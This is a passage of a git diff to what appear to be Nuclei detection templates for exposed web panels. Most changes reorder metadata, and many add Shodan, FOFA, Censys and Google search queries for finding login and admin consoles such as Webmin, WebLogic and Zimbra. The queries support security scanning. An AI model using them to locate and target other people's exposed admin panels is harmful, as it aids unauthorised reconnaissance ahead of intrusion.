vendor: torchbox verified: true + max-request: 2 + vendor: torchbox + product: wagtail + shodan-query: + - title:"Wagtail - Sign in" + - http.title:"wagtail - sign in" + fofa-query: title="wagtail - sign in" + google-query: intitle:"wagtail - sign in" tags: panel,wagtail,torchbox http: diff --git a/http/exposed-panels/wampserver-homepage.yaml b/http/exposed-panels/wampserver-homepage.yaml index c1bbcb0af7..3be3a4dd14 100644 --- a/http/exposed-panels/wampserver-homepage.yaml +++ b/http/exposed-panels/wampserver-homepage.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"WAMPSERVER Homepage" - verified: true tags: panel,wampserver http: diff --git a/http/exposed-panels/watcher-panel.yaml b/http/exposed-panels/watcher-panel.yaml index d5085c80e8..53c5f0de21 100644 --- a/http/exposed-panels/watcher-panel.yaml +++ b/http/exposed-panels/watcher-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: true max-request: 1 shodan-query: html:"/vsaas/v2/static/" - verified: true tags: panel,watcher,login http: diff --git a/http/exposed-panels/watchguard-panel.yaml b/http/exposed-panels/watchguard-panel.yaml index 6f1524d200..3f03d257fb 100644 --- a/http/exposed-panels/watchguard-panel.yaml +++ b/http/exposed-panels/watchguard-panel.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:watchguard:firebox_t15:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: firebox_t15 vendor: watchguard + product: firebox_t15 tags: watchguard,edb,panel http: diff --git a/http/exposed-panels/watershed-panel.yaml b/http/exposed-panels/watershed-panel.yaml index 3fcac1718e..e8fcfb0f09 100644 --- a/http/exposed-panels/watershed-panel.yaml +++ b/http/exposed-panels/watershed-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Watershed LRS" - verified: true tags: panel,watershed http: diff --git a/http/exposed-panels/wazuh-panel.yaml b/http/exposed-panels/wazuh-panel.yaml index 59e6fa9e21..332f94bbe1 100644 --- a/http/exposed-panels/wazuh-panel.yaml +++ b/http/exposed-panels/wazuh-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wazuh - shodan-query: http.title:"Wazuh" vendor: wazuh + product: wazuh + shodan-query: + - http.title:"Wazuh" + - http.title:"wazuh" + fofa-query: title="wazuh" + google-query: intitle:"wazuh" tags: panel,wazuh,login http: diff --git a/http/exposed-panels/wd-mycloud-panel.yaml b/http/exposed-panels/wd-mycloud-panel.yaml index bb1df5c02f..37d14b2d5a 100644 --- a/http/exposed-panels/wd-mycloud-panel.yaml +++ b/http/exposed-panels/wd-mycloud-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:western_digital:mycloud_nas:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: western_digital product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 - vendor: western_digital - verified: true + fofa-query: icon_hash=-1074357885 tags: panel,login,mycloud,wd,detect,western_digital http: diff --git a/http/exposed-panels/web-file-manager.yaml b/http/exposed-panels/web-file-manager.yaml index 4a401c104e..5cf66d7dfa 100644 --- a/http/exposed-panels/web-file-manager.yaml +++ b/http/exposed-panels/web-file-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Web File Manager" - verified: true tags: panel,filemanager http: diff --git a/http/exposed-panels/web-viewer-panel.yaml b/http/exposed-panels/web-viewer-panel.yaml index 969ddba294..3dfc1a201b 100644 --- a/http/exposed-panels/web-viewer-panel.yaml +++ b/http/exposed-panels/web-viewer-panel.yaml @@ -7,11 +7,15 @@ info: classification: cpe: cpe:2.3:h:samsung:dvr:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dvr - shodan-query: title:"Web Viewer for Samsung DVR" - vendor: samsung verified: true + max-request: 1 + vendor: samsung + product: dvr + shodan-query: + - title:"Web Viewer for Samsung DVR" + - http.title:"web viewer for samsung dvr" + fofa-query: title="web viewer for samsung dvr" + google-query: intitle:"web viewer for samsung dvr" tags: panel,web-viewer,detect,samsung http: diff --git a/http/exposed-panels/webcomco-panel.yaml b/http/exposed-panels/webcomco-panel.yaml index ee48997e5f..053dd03adc 100644 --- a/http/exposed-panels/webcomco-panel.yaml +++ b/http/exposed-panels/webcomco-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=626548889515634&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"WebcomCo" - verified: true tags: panel,webcomco,login http: diff --git a/http/exposed-panels/webeditors-check-detect.yaml b/http/exposed-panels/webeditors-check-detect.yaml index adc9cd4ea9..d663e1c1fb 100644 --- a/http/exposed-panels/webeditors-check-detect.yaml +++ b/http/exposed-panels/webeditors-check-detect.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:ckeditor:ckeditor:*:*:*:*:drupal:*:*:* metadata: max-request: 17 - product: ckeditor vendor: ckeditor + product: ckeditor + shodan-query: cpe:"cpe:2.3:a:ckeditor:ckeditor" tags: panel,webeditors,ckeditor http: diff --git a/http/exposed-panels/weblogic-login.yaml b/http/exposed-panels/weblogic-login.yaml index 2b8df9e0ec..35394d080f 100644 --- a/http/exposed-panels/weblogic-login.yaml +++ b/http/exposed-panels/weblogic-login.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:-:*:*:* metadata: max-request: 1 - product: weblogic_server - shodan-query: product:"Oracle Weblogic" vendor: oracle + product: weblogic_server + shodan-query: + - product:"Oracle Weblogic" + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: panel,oracle,weblogic,login http: diff --git a/http/exposed-panels/weblogic-uddiexplorer.yaml b/http/exposed-panels/weblogic-uddiexplorer.yaml index aff2439bc0..75f0aa4ee3 100644 --- a/http/exposed-panels/weblogic-uddiexplorer.yaml +++ b/http/exposed-panels/weblogic-uddiexplorer.yaml @@ -14,8 +14,13 @@ info: cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:-:*:*:* metadata: max-request: 1 - product: weblogic_server vendor: oracle + product: weblogic_server + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: panel,oracle,weblogic,tenable http: diff --git a/http/exposed-panels/webmin-panel.yaml b/http/exposed-panels/webmin-panel.yaml index 404fc08ef9..46e05771e9 100644 --- a/http/exposed-panels/webmin-panel.yaml +++ b/http/exposed-panels/webmin-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: webmin vendor: webmin + product: webmin + shodan-query: http.title:"webmin" + fofa-query: title="webmin" + google-query: intitle:"webmin" tags: panel,webmin http: diff --git a/http/exposed-panels/webmodule-ee-panel.yaml b/http/exposed-panels/webmodule-ee-panel.yaml index 0ac4f553f3..80448adae9 100644 --- a/http/exposed-panels/webmodule-ee-panel.yaml +++ b/http/exposed-panels/webmodule-ee-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" max-request: 1 shodan-query: title:"Webmodule" + google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" tags: edb,panel,webmodule-ee,login http: diff --git a/http/exposed-panels/webroot-login.yaml b/http/exposed-panels/webroot-login.yaml index 0ed2988957..da2df0bf92 100644 --- a/http/exposed-panels/webroot-login.yaml +++ b/http/exposed-panels/webroot-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Webroot - Login" - verified: true tags: panel,webroot http: diff --git a/http/exposed-panels/webshell4-login-panel.yaml b/http/exposed-panels/webshell4-login-panel.yaml index 4bf6ba2908..78049c2ea0 100644 --- a/http/exposed-panels/webshell4-login-panel.yaml +++ b/http/exposed-panels/webshell4-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"webshell4" - verified: true tags: webshell4,panel http: diff --git a/http/exposed-panels/webtitan-cloud-panel.yaml b/http/exposed-panels/webtitan-cloud-panel.yaml index 877a0cb34d..f6ed62d2f7 100644 --- a/http/exposed-panels/webtitan-cloud-panel.yaml +++ b/http/exposed-panels/webtitan-cloud-panel.yaml @@ -9,12 +9,15 @@ info: classification: cpe: cpe:2.3:a:titanhq:webtitan:*:*:*:*:*:*:*:* metadata: - fofa-query: title="WebTitan" + verified: true max-request: 1 + vendor: titanhq product: webtitan shodan-query: http.favicon.hash:1090061843 - vendor: titanhq - verified: true + fofa-query: + - title="WebTitan" + - title="webtitan" + - icon_hash=1090061843 tags: panel,webtitan,cloud,detect,titanhq http: diff --git a/http/exposed-panels/webtransfer-client-panel.yaml b/http/exposed-panels/webtransfer-client-panel.yaml index a7451ec0cd..c834e71edc 100644 --- a/http/exposed-panels/webtransfer-client-panel.yaml +++ b/http/exposed-panels/webtransfer-client-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.progress.com/ftp-server/web-transfer metadata: + verified: true max-request: 1 shodan-query: http.title:"Web Transfer Client" - verified: true tags: panel,webtransferclient,login,detect http: diff --git a/http/exposed-panels/webuzo-admin-panel.yaml b/http/exposed-panels/webuzo-admin-panel.yaml index 9d8cc06823..16a3fb9b14 100644 --- a/http/exposed-panels/webuzo-admin-panel.yaml +++ b/http/exposed-panels/webuzo-admin-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: webuzo - shodan-query: http.title:"Webuzo - Admin Panel" - vendor: softaculous verified: true + max-request: 1 + vendor: softaculous + product: webuzo + shodan-query: + - http.title:"Webuzo - Admin Panel" + - http.title:"webuzo - admin panel" + fofa-query: title="webuzo - admin panel" + google-query: intitle:"webuzo - admin panel" tags: panel,webuzo,admin,softaculous http: diff --git a/http/exposed-panels/weiphp-panel.yaml b/http/exposed-panels/weiphp-panel.yaml index ec961a18bd..e38b33a0ec 100644 --- a/http/exposed-panels/weiphp-panel.yaml +++ b/http/exposed-panels/weiphp-panel.yaml @@ -10,11 +10,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:weiphp:weiphp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: weiphp - shodan-query: http.html:"weiphp" - vendor: weiphp verified: true + max-request: 1 + vendor: weiphp + product: weiphp + shodan-query: + - http.html:"weiphp" + - http.html:"weiphp5.0" + fofa-query: + - body="weiphp" + - body="weiphp5.0" tags: panel,weiphp http: diff --git a/http/exposed-panels/whm-login-detect.yaml b/http/exposed-panels/whm-login-detect.yaml index 60fe019818..36cf21f6c8 100644 --- a/http/exposed-panels/whm-login-detect.yaml +++ b/http/exposed-panels/whm-login-detect.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cpanel:whm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: whm vendor: cpanel + product: whm tags: edb,whm,panel,login,cpanel http: diff --git a/http/exposed-panels/wiren-board-webui.yaml b/http/exposed-panels/wiren-board-webui.yaml index cc38517952..caf4edf84a 100644 --- a/http/exposed-panels/wiren-board-webui.yaml +++ b/http/exposed-panels/wiren-board-webui.yaml @@ -10,9 +10,9 @@ info: cvss-score: 6.5 cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Wiren Board Web UI" - verified: true tags: panel,exposure,wiren http: diff --git a/http/exposed-panels/wmw-enterprise-panel.yaml b/http/exposed-panels/wmw-enterprise-panel.yaml index 1557b670d8..cc87cd1503 100644 --- a/http/exposed-panels/wmw-enterprise-panel.yaml +++ b/http/exposed-panels/wmw-enterprise-panel.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,wmw,detect http: diff --git a/http/exposed-panels/wordpress-login.yaml b/http/exposed-panels/wordpress-login.yaml index 2c28cd0e62..7377b08141 100644 --- a/http/exposed-panels/wordpress-login.yaml +++ b/http/exposed-panels/wordpress-login.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wordpress vendor: wordpress + product: wordpress + shodan-query: + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" tags: panel,wordpress http: diff --git a/http/exposed-panels/workspace-one-uem.yaml b/http/exposed-panels/workspace-one-uem.yaml index 3939879875..8825d78738 100644 --- a/http/exposed-panels/workspace-one-uem.yaml +++ b/http/exposed-panels/workspace-one-uem.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:vmware:workspace_one_uem:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: workspace_one_uem - shodan-query: http.html:"Airwatch" - vendor: vmware verified: true + max-request: 1 + vendor: vmware + product: workspace_one_uem + shodan-query: + - http.html:"Airwatch" + - http.html:"airwatch" + fofa-query: body="airwatch" tags: panel,workspaceone,vmware http: diff --git a/http/exposed-panels/wowza-streaming-engine.yaml b/http/exposed-panels/wowza-streaming-engine.yaml index 52f781e362..02102f55ba 100644 --- a/http/exposed-panels/wowza-streaming-engine.yaml +++ b/http/exposed-panels/wowza-streaming-engine.yaml @@ -9,9 +9,14 @@ info: cpe: cpe:2.3:a:wowza:streaming_engine:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: streaming_engine - shodan-query: http.title:"Manager" product:"Wowza Streaming Engine" vendor: wowza + product: streaming_engine + shodan-query: + - http.title:"Manager" product:"Wowza Streaming Engine" + - http.title:"manager" product:"wowza streaming engine" + - cpe:"cpe:2.3:a:wowza:streaming_engine" + fofa-query: title="manager" product:"wowza streaming engine" + google-query: intitle:"manager" product:"wowza streaming engine" tags: panel,wowza http: diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml index 40b5c97e73..e08437bed0 100644 --- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml +++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml @@ -9,12 +9,24 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - censys-query: services.http.request.uri="*/ThinClient/WTM/public/index.html" - max-request: 1 - product: ws_ftp - shodan-query: http.title:"WS_FTP Server Web Transfer" - vendor: progress verified: true + max-request: 1 + vendor: progress + product: ws_ftp + shodan-query: + - http.title:"WS_FTP Server Web Transfer" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + censys-query: + - services.http.request.uri="*/ThinClient/WTM/public/index.html" + - services.http.request.uri="*/thinclient/wtm/public/index.html" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" tags: panel,ws_ftp,progress http: diff --git a/http/exposed-panels/wso2-management-console.yaml b/http/exposed-panels/wso2-management-console.yaml index e77bcd1e5b..2c0b29b2de 100644 --- a/http/exposed-panels/wso2-management-console.yaml +++ b/http/exposed-panels/wso2-management-console.yaml @@ -13,9 +13,11 @@ info: cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 product: api_manager shodan-query: http.favicon.hash:1398055326 - vendor: wso2 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: panel,wso2,edb http: diff --git a/http/exposed-panels/xeams-admin-console.yaml b/http/exposed-panels/xeams-admin-console.yaml index 9eb12620ce..f941132692 100644 --- a/http/exposed-panels/xeams-admin-console.yaml +++ b/http/exposed-panels/xeams-admin-console.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:synametrics:xeams:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: xeams - shodan-query: http.title:"Xeams Admin" - vendor: synametrics verified: true + max-request: 2 + vendor: synametrics + product: xeams + shodan-query: + - http.title:"Xeams Admin" + - http.title:"xeams admin" + fofa-query: title="xeams admin" + google-query: intitle:"xeams admin" tags: panel,xeams,admin,console,synametrics http: diff --git a/http/exposed-panels/xenmobile-login.yaml b/http/exposed-panels/xenmobile-login.yaml index 40b99313ad..ba1f7e9040 100644 --- a/http/exposed-panels/xenmobile-login.yaml +++ b/http/exposed-panels/xenmobile-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:citrix:xenmobile_device_manager_mdm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: xenmobile_device_manager_mdm vendor: citrix + product: xenmobile_device_manager_mdm tags: panel,edb,citrix http: diff --git a/http/exposed-panels/xfinity-panel.yaml b/http/exposed-panels/xfinity-panel.yaml index 1b8089c067..0cf468a3b0 100644 --- a/http/exposed-panels/xfinity-panel.yaml +++ b/http/exposed-panels/xfinity-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"xfinity" - verified: true tags: panel,xfinity http: diff --git a/http/exposed-panels/xibocms-login.yaml b/http/exposed-panels/xibocms-login.yaml index 2635eb7a35..d0e53a3e14 100644 --- a/http/exposed-panels/xibocms-login.yaml +++ b/http/exposed-panels/xibocms-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"/xibosignage/xibo-cms" - verified: true tags: panel,xibocms http: diff --git a/http/exposed-panels/xnat-login.yaml b/http/exposed-panels/xnat-login.yaml index 17c4e7f9f7..527c60565b 100644 --- a/http/exposed-panels/xnat-login.yaml +++ b/http/exposed-panels/xnat-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"xnat" - verified: true tags: xnat,panel http: diff --git a/http/exposed-panels/xoops/xoops-installation-wizard.yaml b/http/exposed-panels/xoops/xoops-installation-wizard.yaml index ec0466e638..1bc014c471 100644 --- a/http/exposed-panels/xoops/xoops-installation-wizard.yaml +++ b/http/exposed-panels/xoops/xoops-installation-wizard.yaml @@ -9,8 +9,8 @@ info: cpe: cpe:2.3:a:xoops:xoops:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: xoops vendor: xoops + product: xoops tags: panel,xoops http: diff --git a/http/exposed-panels/xvr-login.yaml b/http/exposed-panels/xvr-login.yaml index cf2b55e239..557cca2da2 100644 --- a/http/exposed-panels/xvr-login.yaml +++ b/http/exposed-panels/xvr-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:h:dahuasecurity:xvr5xxx:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: xvr5xxx - shodan-query: http.title:"XVR LOGIN" vendor: dahuasecurity + product: xvr5xxx + shodan-query: + - http.title:"XVR LOGIN" + - http.title:"xvr login" + fofa-query: title="xvr login" + google-query: intitle:"xvr login" tags: panel,xvr,dahuasecurity http: diff --git a/http/exposed-panels/xweb500-panel.yaml b/http/exposed-panels/xweb500-panel.yaml index 55454875b4..f52a33d8ca 100644 --- a/http/exposed-panels/xweb500-panel.yaml +++ b/http/exposed-panels/xweb500-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: inurl:"xweb500.cgi" max-request: 1 + google-query: inurl:"xweb500.cgi" tags: panel,xweb500 http: diff --git a/http/exposed-panels/xxljob-panel.yaml b/http/exposed-panels/xxljob-panel.yaml index b201c80c37..6dd139154f 100644 --- a/http/exposed-panels/xxljob-panel.yaml +++ b/http/exposed-panels/xxljob-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: xuxueli product: xxl-job shodan-query: http.favicon.hash:1691956220 - vendor: xuxueli - verified: true + fofa-query: icon_hash=1691956220 tags: panel,xxljob,login,xuxueli http: diff --git a/http/exposed-panels/yarn-manager-exposure.yaml b/http/exposed-panels/yarn-manager-exposure.yaml index 3925658336..7ca14b6484 100644 --- a/http/exposed-panels/yarn-manager-exposure.yaml +++ b/http/exposed-panels/yarn-manager-exposure.yaml @@ -9,8 +9,8 @@ info: cpe: cpe:2.3:a:apache:hadoop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: hadoop vendor: apache + product: hadoop tags: panel,apache,yarn,exposure http: diff --git a/http/exposed-panels/yellowfin-panel.yaml b/http/exposed-panels/yellowfin-panel.yaml index 59f7f84e59..cfc3f6b027 100644 --- a/http/exposed-panels/yellowfin-panel.yaml +++ b/http/exposed-panels/yellowfin-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDK severity: info metadata: + verified: true max-request: 1 shodan-query: title:"Yellowfin Information Collaboration" - verified: true tags: yellowfin,panel,login http: diff --git a/http/exposed-panels/yzmcms-panel.yaml b/http/exposed-panels/yzmcms-panel.yaml index f3a0b41d66..accfe1e223 100644 --- a/http/exposed-panels/yzmcms-panel.yaml +++ b/http/exposed-panels/yzmcms-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: yzmcms - shodan-query: http.title:"YzmCMS" vendor: yzmcms + product: yzmcms + shodan-query: + - http.title:"YzmCMS" + - http.title:"yzmcms" + fofa-query: title="yzmcms" + google-query: intitle:"yzmcms" tags: panel,yzmcms,login http: diff --git a/http/exposed-panels/zabbix-server-login.yaml b/http/exposed-panels/zabbix-server-login.yaml index 763599a3c7..ef1bea293d 100644 --- a/http/exposed-panels/zabbix-server-login.yaml +++ b/http/exposed-panels/zabbix-server-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zabbix - shodan-query: http.title:"zabbix-server" vendor: zabbix + product: zabbix + shodan-query: + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + - http.favicon.hash:892542951 + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" + google-query: intitle:"zabbix-server" tags: panel,zabbix http: diff --git a/http/exposed-panels/zblog-exposed-admin-panel.yaml b/http/exposed-panels/zblog-exposed-admin-panel.yaml index 3fe134b539..3ee91231d5 100644 --- a/http/exposed-panels/zblog-exposed-admin-panel.yaml +++ b/http/exposed-panels/zblog-exposed-admin-panel.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zblogcn:zblogphp:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: zblogcn product: zblogphp shodan-query: http.title:zblog - vendor: zblogcn - verified: true + fofa-query: title=zblog + google-query: intitle:zblog tags: zblog,panel,zblogcn http: diff --git a/http/exposed-panels/zenario-login-panel.yaml b/http/exposed-panels/zenario-login-panel.yaml index 44740e72f4..8ea675cd3b 100644 --- a/http/exposed-panels/zenario-login-panel.yaml +++ b/http/exposed-panels/zenario-login-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:tribalsystems:zenario:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zenario vendor: tribalsystems + product: zenario tags: panel,zenario,tribalsystems http: diff --git a/http/exposed-panels/zentao-detect.yaml b/http/exposed-panels/zentao-detect.yaml index b69cf973f9..e2367be84e 100644 --- a/http/exposed-panels/zentao-detect.yaml +++ b/http/exposed-panels/zentao-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zentao vendor: easycorp + product: zentao tags: panel,easycorp http: diff --git a/http/exposed-panels/zeroshell-login.yaml b/http/exposed-panels/zeroshell-login.yaml index 98e2c299bb..ec9e2ab6a3 100644 --- a/http/exposed-panels/zeroshell-login.yaml +++ b/http/exposed-panels/zeroshell-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:zeroshell:zeroshell:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zeroshell - shodan-query: http.title:"ZeroShell" vendor: zeroshell + product: zeroshell + shodan-query: + - http.title:"ZeroShell" + - http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: panel,zeroshell http: diff --git a/http/exposed-panels/zimbra-web-client.yaml b/http/exposed-panels/zimbra-web-client.yaml index 58c5a6e154..b0d5175a53 100644 --- a/http/exposed-panels/zimbra-web-client.yaml +++ b/http/exposed-panels/zimbra-web-client.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: zimbra_collaboration_suite - shodan-query: http.title:"Zimbra Web Client Sign In" - vendor: synacor verified: true + max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + shodan-query: + - http.title:"Zimbra Web Client Sign In" + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: edb,panel,zimbra,synacor http: diff --git a/http/exposed-panels/zimbra-web-login.yaml b/http/exposed-panels/zimbra-web-login.yaml index 3f839da8a8..edadc3042d 100644 --- a/http/exposed-panels/zimbra-web-login.yaml +++ b/http/exposed-panels/zimbra-web-login.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: zimbra_collaboration_suite - shodan-query: http.title:"Zimbra Collaboration Suite" - vendor: synacor verified: true + max-request: 1 + vendor: synacor + product: zimbra_collaboration_suite + shodan-query: + - http.title:"Zimbra Collaboration Suite" + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: panel,zimbra,synacor http: diff --git a/http/exposed-panels/zipkin-exposure.yaml b/http/exposed-panels/zipkin-exposure.yaml index 133d64a47f..975161d013 100644 --- a/http/exposed-panels/zipkin-exposure.yaml +++ b/http/exposed-panels/zipkin-exposure.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"webpackJsonpzipkin-lens" - verified: true tags: panel,zipkin http: diff --git a/http/exposed-panels/zoho/manageengine-adaudit.yaml b/http/exposed-panels/zoho/manageengine-adaudit.yaml index aac6d3f365..6ef1cee351 100644 --- a/http/exposed-panels/zoho/manageengine-adaudit.yaml +++ b/http/exposed-panels/zoho/manageengine-adaudit.yaml @@ -14,11 +14,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: manageengine_adaudit_plus - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" - vendor: zohocorp verified: true + max-request: 2 + vendor: zohocorp + product: manageengine_adaudit_plus + shodan-query: + - http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" + fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" + google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-adselfservice.yaml b/http/exposed-panels/zoho/manageengine-adselfservice.yaml index c124acd633..804cb947ab 100644 --- a/http/exposed-panels/zoho/manageengine-adselfservice.yaml +++ b/http/exposed-panels/zoho/manageengine-adselfservice.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: manageengine_adselfservice_plus - shodan-query: http.title:"ADSelfService Plus" - vendor: zohocorp verified: true + max-request: 2 + vendor: zohocorp + 